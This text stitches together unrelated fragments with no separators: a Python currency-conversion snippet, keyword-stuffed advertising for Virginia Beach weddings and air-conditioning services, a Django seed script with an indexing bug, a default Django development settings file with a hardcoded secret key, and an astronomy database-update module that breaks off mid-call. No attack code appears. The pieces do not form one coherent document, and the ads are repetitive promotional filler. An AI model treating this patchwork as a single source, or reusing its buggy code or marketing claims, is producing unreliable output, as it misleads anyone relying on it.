instance. :raises: :class:`~rockefeller.exceptions.ExchangeError` if Exchange rate bettween currencies is not defined. """ if exchange_rate is None: exchange_rate = self.get_exchange_rate_to( currency, indirection_currency=indirection_currency) else: exchange_rate = to_decimal(exchange_rate) if exchange_rate is None: raise ExchangeError('Exchange rate {}-{} not defined.'.format( self.currency, currency)) amount = round_amount(self.amount * exchange_rate, currency) return self.__class__(amount=amount, currency=currency)
Every couple wants to have a dream wedding somewhere that is romantic and that they will remember for the rest of their lives. A wedding can be a dream come true by choosing wedding locations in Virginia Beach and then having one of the Virginia Beach wedding receptions. Planning a wedding can become a nightmare if you do not ask for help and according to Brides magazine, most average couples spend around $27,000 on that perfect dream wedding and that does not count the Virginia Beach wedding receptions to come. In today’s modern age at least three quarters of the couples who get married plan to pay for their entire wedding or at least help to pay for their wedding, this is put up against the couple whose relatives are paying for the entire wedding alone. Event catering in virginia beach should be able to help curb some of that cost at with their Virginia Beach wedding receptions. Just call and ask for the event locations in Virginia Beach to be given some options. It is interesting to note that the first mention of wedding bands goes all the way back to Egypt in 2800 B.C. In modern day society there are more than 7,000 marriages that take place each day in the USA alone. That is a lot of Virginia Beach wedding receptions and a lot of Virginia beach wedding catering plans. It is best to get a Virginia Beach event planning resource guide when planning your wedding and reception as more than 40 percent of couples getting married today plan the entire wedding together. That is quite a change from the old days.
from random import randint, sample, choice from app.models import Category, Designation, Project, Requirement def add_projects(num_projects=20): designations = [d['name'] for d in Designation.get_all()] categories = [c['name'] for c in Category.get_all()] year = [y['requirement_name'] for y in Requirement.get_all_year(include_none=True)] major = [m['requirement_name'] for m in Requirement.get_all_major(include_none=True)] department = [d['requirement_name'] for d in Requirement.get_all_department(include_none=True)] for i in xrange(num_projects): name = 'Project #{}'.format(i) description = 'Description for {}'.format(name) advisor_name = 'Advisor for {}'.format(name) advisor_email = 'project{}[email protected]'.format(i) est_num_students = randint(0, 1000) designation = designations[randint(0, len(designations) - 1)] cats = [categories[i] for i in sample(xrange(len(categories)), randint(2, 5))] reqs = [] if choice([True, False]): reqs.append(year[randint(0, len(year) - 1)]) if choice([True, False]): reqs.append(major[randint(0, len(major) - 1)]) else: reqs.append(major[randint(0, len(department) - 1)]) new_project = Project( name=name, description=description, advisor_name=advisor_name, advisor_email=advisor_email, est_num_students=est_num_students, designation_name=designation, categories=cats, requirements=reqs, is_new_project=True ) new_project.save() if __name__=='__main__': add_projects()
You can easily have confidence in Air Conditioning Top Team to provide the very best expert services when it comes to Goodman Air Conditioning in Avery, CA. You need the most innovative technology in the field, and our team of highly trained professionals will offer exactly that. Our supplies are always of the highest quality and we know how to help you save money. Contact us by dialing 888-368-1326 and we will be able to examine the options, reply to your concerns, and organize a consultation to get started with organizing the project. Here at Air Conditioning Top Team, we understand that you want to stay within budget and save money wherever you're able to. On top of that, you would like the best and finest standard of work for Goodman Air Conditioning in Avery, CA. We will make sure that our cash conserving efforts do not indicate a decreased level of quality. Whenever you hire our staff, you'll get the advantages of our knowledge and premium supplies to make certain that any project will last even while saving time and money. To illustrate, we take care to stay away from pricey errors, work fast to help save hours, and make sure you are given the very best prices on products and labor. To be able to find great deals, Air Conditioning Top Team is the service to connect with. Dial 888-368-1326 to talk to our client care agents, now. It is important to be knowledgeable concerning Goodman Air Conditioning in Avery, CA. We ensure that you know what can be expected. That is why we try to make every attempt to be sure that you are aware of the process and are not faced with any sort of surprises. Step one will be to call us today by dialing 888-368-1326 to begin your task. Within this call, you get all your questions responded to, and we can arrange a time to get started with work. We consistently arrive at the scheduled hour, ready to work together with you. If you are planning a venture regarding Goodman Air Conditioning in Avery, CA, there are plenty of reasons to work with Air Conditioning Top Team. Our products are of the very best quality, our cash saving practices are practical and powerful, and our customer service scores are unparalleled. We are there to serve you with the most experience and expertise in the market. Dial 888-368-1326 to connect with Air Conditioning Top Team and explore all your expectations regarding Goodman Air Conditioning in Avery.
""" Django settings for mysite project. For more information on this file, see https://docs.djangoproject.com/en/1.6/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.6/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '=vo#pirs@)4p%&#nnek+gq0yr7f2la1f@a51*3u4=h4&py9fo_' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'polls', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'mysite.urls' WSGI_APPLICATION = 'mysite.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ STATIC_URL = '/static/' TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
Get in touch with John Kilgore Heating & Air in Apison for a full air conditioning tune up today! With our comprehensive professional service, we have been able to keep up with the needs of our customers in Apison TN and always bring the highest level of dedication. Our heating & cooling specialists will always respect your schedule and your home by arriving on time and working to complete the job promptly while leaving the site nice and tidy. We are always available to you at John Kilgore Heating & Air.
################################################################################################################ # Collection of routines to update the RoboNet database tables # Keywords match the class model fields in ../robonet_site/events/models.py # # Written by Yiannis Tsapras Sep 2015 # Last update: ################################################################################################################ # Import dependencies import os import sys from local_conf import get_conf robonet_site = get_conf('robonet_site') sys.path.append(robonet_site) #os.environ['DJANGO_SETTINGS_MODULE'] = 'robonet_site.settings' os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'robonet_site.settings') from django.core import management from django.conf import settings from django.utils import timezone from django import setup setup() #from events.models import Event, Single_Model, Binary_Model, Data_File, Robonet_Log, Robonet_Reduction, Robonet_Request, Robonet_Status, Ogle_Detail, Moa_Detail, Kmt_Detail from events.models import Operator, Telescope, Instrument, Filter, Event, Event_Name ################################################################################################################ def add_operator(operator_name): """ Adds a new operator name in the database. This can be the survey name or the name of the follow-up group. Keyword arguments: operator_name -- The operator name (string, required) """ new_operator = Operator.objects.get_or_create(name=operator_name) if new_operator[-1] == False: successful = False else: successful = True return successful ################################################################################################################ def add_telescope(operator, telescope_name, aperture=0.0, latitude=0.0, longitude=0.0, altitude=0.0, site=""): """ Adds a new telescope name in the database. Keyword arguments: operator -- The operator (object, required) -- ForeignKey object telescope_name -- The telescope name (string, required) aperture -- The telescope aperture (float, optional, default=0.0) latitude -- The telescope latitude (N) in decimal degrees (float, optional, default=0.0) longitude -- The telescope longitude (E) in decimal degrees (float, optional, default=0.0) altitude -- The telescope altitude in meters (float, optional, default=0.0) site -- The site name (string, optional, default="") """ known_telescope = Telescope.objects.filter(name=telescope_name).exists() # If the telescope already exists there's no need to add it if known_telescope == True: successful = False else: add_new = Telescope(operator=operator, name=telescope_name, aperture=aperture, latitude=latitude, longitude=longitude, altitude=altitude,site=site) add_new.save() successful = True return successful ################################################################################################################ def add_instrument(telescope, instrument_name, pixscale=0.0): """ Adds a new instrument name in the database. A single instrument can appear multiple times in this list as it can be moved to different telescopes. Keyword arguments: telescope -- The telescope (object, required) -- ForeignKey object instrument_name -- The instrument name (string, required) pixscale -- The pixel scale of the CCD (arcsec/pix) """ try: add_new = Instrument(telescope=telescope, name=instrument_name, pixscale=pixscale) add_new.save() successful = True except: successful = False return successful ################################################################################################################ def add_filter(instrument, filter_name): """ Adds a new filter name in the database. A single filter can appear multiple times in this list as it can exist for different instruments. Keyword arguments: instrument -- The instrument (object, required) -- ForeignKey object filter_name -- The filter name (string, required) """ try: add_new = Filter(instrument=instrument, name=filter_name) add_new.save() successful = True except: successful = False return successful ################################################################################################################ def check_exists(event_name): """ Check if event exists in database. Keyword arguments: event_name -- The event name (string, required) """ if event_name.startswith("OGLE"): successful = Event.objects.filter(ev_name_ogle=event_name).exists() elif event_name.startswith("MOA"): successful = Event.objects.filter(ev_name_moa=event_name).exists() elif event_name.startswith("KMT"): successful = Event.objects.filter(ev_name_kmt=event_name).exists() else: successful = False return successful ################################################################################################################ def check_coords(event_name, check_ra, check_dec): """ Cross-survey identification check. Check if an event at these coordinates already exists in the database. Keyword arguments: event_name -- The event name (string, required) check_ra -- event RA. (string, required) e.g. "17:54:33.58" check_dec -- event DEC. (string, required) e.g. "-30:31:02.02" """ ################################################################################################################ def add_new_event(event_name, event_ra, event_dec, bright_neighbour = False): """ Add a new event to the database. Keyword arguments: ev_name_ogle -- OGLE name of event. (string, optional, default='...') e.g. "OGLE-2015-BLG-1234" ev_name_moa -- MOA name of event. (string, optional, default='...') e.g. "MOA-2015-BLG-123" ev_name_kmt -- KMT name of event. (string, optional, default='...') e.g. "KMT-2015-BLG-1234" ev_ra -- event RA. (string, required) e.g. "17:54:33.58" ev_dec -- event DEC. (string, required) e.g. "-30:31:02.02" bright_neighbour -- Is there a bright neighbour? (boolean, optional, default=False) """ # Check if the event already exists in the database. If not, add it. if event_name.startswith("OGLE") and check_exists(event_name)==False: ev = Event(ev_name_ogle=event_name, ev_ra=event_ra, ev_dec=event_dec, bright_neighbour = bright_neighbour) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==False: ev = Event(ev_name_moa=event_name, ev_ra=event_ra, ev_dec=event_dec, bright_neighbour = bright_neighbour) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==False: ev = Event(ev_name_kmt=event_name, ev_ra=event_ra, ev_dec=event_dec, bright_neighbour = bright_neighbour) ev.save() successful = True else: successful = False return successful def update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat): """ Add or Update a data file to the database. Uses the .dat files rsynced from ARTEMiS. Keyword arguments: event_name -- The event name (string, required) datafile -- Full path to the data file (string, required) last_upd -- datetime of last update. (datetime, required, default=timezone.now()) last_mag -- last recorded magnitude (float, required) tel -- telescope identifier (string, required) ver -- reduction version identifier (integer, required) ndat -- number of data points (integer, required) """ # Check if the event already exists in the database. if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier. ev = Event.objects.get(ev_name_ogle=event_name) ev.data_file_set.update_or_create(datafile=datafile, last_updated=last_upd, last_magnitude=last_mag, telescope=tel, version=ver, ndata=ndat) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: # Get event identifier. ev = Event.objects.get(ev_name_moa=event_name) ev.data_file_set.update_or_create(datafile=datafile, last_updated=last_upd, last_magnitude=last_mag, telescope=tel, version=ver, ndata=ndat) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: # Get event identifier. ev = Event.objects.get(ev_name_kmt=event_name) ev.data_file_set.update_or_create(datafile=datafile, last_updated=last_upd, last_magnitude=last_mag, telescope=tel, version=ver, ndata=ndat) ev.save() successful = True else: successful = False return successful ################################################################################################################ def ogle_details(event_name, Tmax, tau, umin, url_link, last_updated=timezone.now()): """ Update or Add OGLE event details to the database. These are the survey event parameters as displayed on the survey website. Keyword arguments: event_name -- OGLE name of event. (string, required) e.g. "OGLE-2015-BLG-1234" Tmax -- time of maximum magnification.(float, required) e.g. 2457135.422 tau -- event timescale (in days). (float, required) umin -- minimum impact parameter (in units of R_E). (float, required) last_updated -- datetime of last update. (datetime, required, default=timezone.now()) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) url_link -- URL link to OGLE survey event page (string, required) """ # Check if the event already exists in the database. if check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.ogle_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin, last_updated=last_updated, url_link=url_link) ev.save() successful = True else: successful = False return successful ################################################################################################################ def moa_details(event_name, Tmax, tau, umin, url_link, last_updated=timezone.now()): """ Update or Add MOA event details to the database. These are the survey event parameters as displayed on the survey website. Keyword arguments: event_name -- MOA name of event. (string, required) e.g. "MOA-2015-BLG-123" Tmax -- time of maximum magnification.(float, required) e.g. 2457135.422 tau -- event timescale (in days). (float, required) umin -- minimum impact parameter (in units of R_E). (float, required) last_updated -- datetime of last update. (datetime, required, default=timezone.now()) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) url_link -- URL link to MOA survey event page (string, required) """ # Check if the event already exists in the database. if check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_moa=event_name) ev.moa_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin, last_updated=last_updated, url_link=url_link) ev.save() successful = True else: successful = False return successful ################################################################################################################ def kmt_details(event_name, Tmax, tau, umin, url_link, last_updated=timezone.now()): """ Update or Add KMT event details to the database. These are the survey event parameters as displayed on the survey website. Keyword arguments: event_name -- KMT name of event. (string, required) e.g. "KMT-2015-BLG-1234" Tmax -- time of maximum magnification.(float, required) e.g. 2457135.422 tau -- event timescale (in days). (float, required) umin -- minimum impact parameter (in units of R_E). (float, required) last_updated -- datetime of last update. (datetime, required, default=timezone.now()) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) url_link -- URL link to KMT survey event page (string, required) """ # Check if the event already exists in the database. if check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_kmt=event_name) ev.kmt_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin, last_updated=last_updated, url_link=url_link) ev.save() successful = True else: successful = False return successful ################################################################################################################ def single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated): """ Update or Add Single Lens model parameters as estimated by ARTEMiS to the database. Keyword arguments: event_name -- KMT name of event. (string, required) e.g. "KMT-2015-BLG-1234" Tmax -- time of maximum magnification.(float, required) e.g. 2457135.422 e_Tmax -- error in Tmax (float, required) tau -- event timescale (in days). (float, required) e_tau -- error in tau (float, required) umin -- minimum impact parameter (in units of R_E). (float, required) e_umin -- error in umin (float, required) last_updated -- datetime of last update. (datetime, required) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) """ # Check if the event already exists in the database. if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_moa=event_name) ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_kmt=event_name) ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, last_updated=last_updated) ev.save() successful = True else: successful = False return successful ################################################################################################################ def double_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, q, e_q, s, e_s, rho, alpha, last_updated): """ Update or Add Binary Lens model parameters as estimated by ARTEMiS to the database. Keyword arguments: event_name -- KMT name of event. (string, required) e.g. "KMT-2015-BLG-1234" Tmax -- time of maximum magnification.(float, required) e.g. 2457135.422 e_Tmax -- error in Tmax (float, required) tau -- event timescale (in days). (float, required) e_tau -- error in tau (float, required) umin -- minimum impact parameter (in units of R_E). (float, required) e_umin -- error in umin (float, required) q -- mass ratio between the lensing components. (float, required) e_q -- error in q (float, required) s -- projected separation between the two lensing components (in units of R_E). (float, required) e_s -- error in s (float, required) rho -- finite source size (in units of R_E). (float, required) alpha -- trajectory angle w.r.t. binary axis (float, required) last_updated -- datetime of last update. (datetime, required) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) """ # Check if the event already exists in the database. if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q, e_mass_ratio=e_q, separation=s, e_separation=e_s, rho_finite=rho, angle_a = alpha, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_moa=event_name) ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q, e_mass_ratio=e_q, separation=s, e_separation=e_s, rho_finite=rho, angle_a = alpha, last_updated=last_updated) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_kmt=event_name) ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau, e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q, e_mass_ratio=e_q, separation=s, e_separation=e_s, rho_finite=rho, angle_a = alpha, last_updated=last_updated) ev.save() successful = True else: successful = False return successful ################################################################################################################ def update_log(event_name, image_name, timestamp, exptime, filter1, filter2, filter3, telescope, instrument, group_id, track_id, req_id, airmass, fwhm, sky_bg, sd_bg, moon_sep, elongation, nstars, quality): """ Update Log with new image details in the database. Keyword arguments: event_name -- The event name. (string, required) e.g. "OGLE-2015-BLG-1234" image_name -- The image name. (string, required) e.g. lsc1m005-kb78-20150922-0089-e10.fits timestamp -- Time of observation. (datetime, required) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) exptime -- Exposure time. (float, required) filter1 -- Filter1 wheel identifier. (string, required) filter2 -- Filter2 wheel identifier. (string, required) filter3 -- Filter3 wheel identifier. (string, required) telescope -- Telescope identifier. (string, required) e.g. "1m0-05" instrument -- Instrument identifier.(string, required) e.g. "kb78" group_id -- Group identifier. (string, required) e.g. "RBN20150922T15.42112818" track_id -- Track identifier. (string, required) e.g. "0000110965" req_id -- Request identifier. (string, required) e.g. "0000427795" airmass -- Airmass. (float, required) fwhm -- average fwhm of stars. (in pixels) (float, required) sky_bg -- sky background value. (in ADU) (float, required) sd_bg -- error in sky_bg (float, required) moon_sep -- angular distance of centre of moon from target. (float, required) elongation -- estimated elongation of stars. (float, required) nstars -- number of stars found in image. (integer, required) quality -- image quality assessment. (string, required) """ if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name, timestamp=timestamp, exptime=exptime, filter1=filter1, filter2=filter2, filter3=filter3, telescope=telescope, instrument=instrument, group_id=group_id, track_id=track_id, req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg, sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation, nstars=nstars, quality=quality) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_moa=event_name) ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name, timestamp=timestamp, exptime=exptime, filter1=filter1, filter2=filter2, filter3=filter3, telescope=telescope, instrument=instrument, group_id=group_id, track_id=track_id, req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg, sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation, nstars=nstars, quality=quality) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_kmt=event_name) ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name, timestamp=timestamp, exptime=exptime, filter1=filter1, filter2=filter2, filter3=filter3, telescope=telescope, instrument=instrument, group_id=group_id, track_id=track_id, req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg, sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation, nstars=nstars, quality=quality) ev.save() successful = True else: successful = False return successful ################################################################################################################ def update_reduction(event_name, lc_file, timestamp, version, ref_image, ron=0.0, gain=1.0, oscanx1=1, oscanx2=50, oscany1=1, oscany2=500, imagex1=51, imagex2=1000, imagey1=1, imagey2=1000, minval=1.0, maxval=55000.0, growsatx=0, growsaty=0, coeff2=1.0e-06, coeff3=1.0e-12, sigclip=4.5, sigfrac=0.5, flim=2.0, niter=4, use_reflist=0, max_nimages=1, max_sky=5000.0, min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0, min_scale=0.99, max_scale=1.01, fov=0.1, star_space=30, init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0, var_deg=1, det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7, psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0, lres_ker_rad=2.0, subframes_x=1, subframes_y=1, grow=0.0, ps_var=0, back_var=1, diffpro=0): """ Add or Update the lightcurve location and pipeline event reduction parameters in the database. Also stores the reference frame name and DanDIA parameters used to generate the lightcurve. Keyword arguments: event_name -- The event name. (string, required) e.g. "OGLE-2015-BLG-1234" lc_file -- The lightcurve file. (string, required) timestamp -- The date the lightcurve file was created. (datetime, required) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) version -- Reduction identifier (integer, required) ref_image -- Reference image used. (string, required) -+-+- DanDIA parameters -+-+- ron -- CCD readout noise (in ADU) (float, optional, default=0.0) gain -- CCD gain. (e-/ADU) (float, optional, default=1.0) oscanx1 -- Overscan strip coordinate x1 (integer, optional, default=1) oscanx2 -- Overscan strip coordinate x2 (integer, optional, default=50) oscany1 -- Overscan strip coordinate y1 (integer, optional, default=1) oscany2 -- Overscan strip coordinate y2 (integer, optional, default=500) imagex1 -- Image region coordinate x1 (integer, optional, default=51) imagex2 -- Image region coordinate x2 (integer, optional, default=1000) imagey1 -- Image region coordinate y1 (integer, optional, default=1) imagey2 -- Image region coordinate y2 (integer, optional, default=1000) minval -- Minimum useful pixel value in a raw image (ADU). (float, optional, default=1.0) maxval -- maximum useful pixel value in a raw image (ADU). (float, optional, default=55000.0) growsatx -- Half box size in the x direction (pix) to be used for growing saturated bad pixels in the bad pixel mask for each science image. This parameter should be non-negative. (integer, optional, default=0) growsaty -- Half box size in the y direction (pix) to be used for growing saturated bad pixels in the bad pixel mask for each science image. This parameter should be non-negative. (integer, optional, default=0) coeff2 -- Coefficient a1 in the linearisation equation: Xnew = X + a1*X^2 + a2*X^3 where X represents the image counts after bias level and bias pattern correction. (float, optional, default=1.0e-06) coeff3 -- Coefficient a1 in the linearisation equation: Xnew = X + a1*X^2 + a2*X^3 where X represents the image counts after bias level and bias pattern correction. (float, optional, default=1.0e-12) sigclip -- Threshold in units of sigma for cosmic ray detection on the Laplacian image. This parameter should be positive. (float, optional, default=4.5) sigfrac -- Fraction of "sigclip" to be used as a threshold for cosmic ray growth. This parameter should be positive. (float, optional, default=0.5) flim --.Minimum contrast between the Laplacian image and the fine structure image. This parameter should be positive. (float, optional, default=2.0) niter -- Maximum number of iterations to perform. This parameter should be positive. (integer, optional, default=4) use_reflist -- Use images in reflist.<filt>.txt? (integer, optional, default=0 (No)) max_nimages -- Maximum number of images to combine for reference. (integer, optional, default=1) max_sky -- Maximum acceptable value for sky background. (float, optional, default=5000.0) min_ell -- Minimum PSF ellipticity for image to be used in reference. (float, optional, default=0.8) trans_type -- Type of coordinate transformation to fit when fitting a coordinate transformation between two images. Options:["shift"=General pixel shift, "rot_shift"=Rotation and general pixel shift, "rot_mag_shift"=Rotation magnification and general pixel shift, "linear"=Linear, "polynomial"=Polynomial] (string, optional, default='polynomial') trans_auto -- Use automatic determination of the coordinate transformation type when fitting a coordinate transformation between two images? (integer, optional, default=0 (No)) replace_cr -- Replace cosmic ray pixels? (integer, optional, default=0 (No)) min_scale -- Minimum possible transformation scale factor (magnification) between any two images. (float, optional, default=0.99) max_scale -- Maximum possible transformation scale factor (magnification) between any two images. (float, optional, default=1.01) fov -- Field of view of the CCD camera (deg). (float, optional, default=0.1) star_space -- Average spacing (pix) between stars. (integer, optional, default=30) init_mthresh -- Initial distance threshold (pix) to reject false star matches. (float, optional, default=1.0) smooth_pro -- Smooth image? (integer, optional, default=2) smooth_fwhm -- Amount of smoothing to perform (float, optional, default=3.0) var_deg -- Polynomial degree of the spatial variation of the model used to represent the image PSF. (0=Constant, 1=Linear, 2=Quadratic, 3=Cubic) (integer, optional, default=1) det_thresh -- Detection threshold used to detect stars in units of image sky sigma. (float, optional, default=2.0) psf_thresh -- Detection threshold used to detect candidate PSF stars in units of image sky sigma. (float, optional, default=8.0) psf_size -- Size of the model PSF stamp in units of FWHM. (float, optional, default=8.0) psf_comp_dist -- Any star within a distance "0.5*psf_comp_dist*psf_size", in units of FWHM, of another star is considered to be a companion of that star for PSF star selection. (float, optional, default=0.7) psf_comp_flux -- Maximum flux ratio that any companion star may have for a star to be considered a PSF star. (float, optional, default=0.1) psf_corr_thres -- Minimum correlation coefficient of a star with the image PSF model in order to be considered a PSF star. (float, optional, default=0.9) ker_rad -- Radius of the kernel pixel array in units of image FWHM. (float, optional, default=2.0) lres_ker_rad -- Threshold radius of the kernel pixel array, in units of image FWHM, beyond which kernel pixels are of lower resolution. (float, optional, default=2.0) subframes_x -- Number of subdivisions in the x direction used in defining the grid of kernel solutions. (integer, optional, default=1) subframes_y -- Number of subdivisions in the y direction used in defining the grid of kernel solutions. (integer, optional, default=1) grow -- Amount of overlap between the image regions used for the kernel solutions. (float, optional, default = 0.0) ps_var -- Use spatially variable photometric scale factor? (integer, optional, default=0 (No)) back_var -- Use spatially variable differential background. (integer, optional, default=1 (Yes)) diffpro -- Switch for the method of difference image creation. (integer, optional, default=0 (No)) """ if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file, timestamp=timestamp, version=version, ref_image=ref_image, ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2, oscany1=oscany1, oscany2=oscany2, imagex1=imagex1, imagex2=imagex2, imagey1=imagey1, imagey2=imagey2, minval=minval, maxval=maxval, growsatx=growsatx, growsaty=growsaty, coeff2=coeff2, coeff3=coeff3, sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter, use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky, min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto, replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale, fov=fov, star_space=star_space, init_mthresh=init_mthresh, smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg, det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size, psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux, psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad, lres_ker_rad=lres_ker_rad, subframes_x=subframes_x, subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var, diffpro=diffpro) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_moa=event_name) ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file, timestamp=timestamp, version=version, ref_image=ref_image, ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2, oscany1=oscany1, oscany2=oscany2, imagex1=imagex1, imagex2=imagex2, imagey1=imagey1, imagey2=imagey2, minval=minval, maxval=maxval, growsatx=growsatx, growsaty=growsaty, coeff2=coeff2, coeff3=coeff3, sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter, use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky, min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto, replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale, fov=fov, star_space=star_space, init_mthresh=init_mthresh, smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg, det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size, psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux, psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad, lres_ker_rad=lres_ker_rad, subframes_x=subframes_x, subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var, diffpro=diffpro) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_kmt=event_name) ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file, timestamp=timestamp, version=version, ref_image=ref_image, ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2, oscany1=oscany1, oscany2=oscany2, imagex1=imagex1, imagex2=imagex2, imagey1=imagey1, imagey2=imagey2, minval=minval, maxval=maxval, growsatx=growsatx, growsaty=growsaty, coeff2=coeff2, coeff3=coeff3, sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter, use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky, min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto, replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale, 